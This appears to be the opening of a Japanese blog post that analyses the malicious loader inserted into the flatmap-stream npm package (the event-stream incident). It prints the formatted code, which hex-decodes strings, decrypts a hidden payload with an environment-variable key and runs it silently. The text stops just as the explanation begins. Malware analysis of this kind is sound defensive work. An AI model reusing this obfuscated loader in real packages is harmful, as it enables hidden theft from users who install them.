未来のハッカー(自称)がevent-stream騒動の攻撃コードを説明する
未来のハッカー(自称)がevent-stream騒動の攻撃コードを説明する : まずお詫び。タイトルに「未来のハッカー(自称)」と書きましたが、そんなわけないです。全国のハッカーの皆様、本当に申し訳ございませんm(_ _)m 人気のnpmパッケージである「event-stream」が依存している「flatmap-stream」というパッケージにBitcoinを盗むコードが入れられた事件で、具体的に入れられた攻撃コードを解析してみました。 このページの内容が間違っていたら教えていただけると幸いです。 また、この事件に関する概要などは https://qiita.com/mysticatea/items/aac027f9183ea9f0f9b1 に詳しく書いてありました。この事件に関して知らない場合はあらかじめ読んでおくことをおすすめします。 flatmap-streamの index.min.js の攻撃コードの部分(整形済み) index.min.js !function () { try { var r = require; var t = process; function e(r) { return Buffer.from(r, 'hex').toString(); } var n = r(e('2e2f746573742f64617461')); var o = t[e(n[3])][e(n[4])]; if (!o) return; var u = r(e(n[2]))[e(n[6])](e(n[5]), o); var a = u.update(n[0], e(n[8]), e(n[9])); a += u.final(e(n[9])); var f = new module.constructor; f.paths = module.paths; f[e(n[7])](a, ''); f.exports(n[1]); } catch (r) { } }(); このコードの意味を順番に説明します。...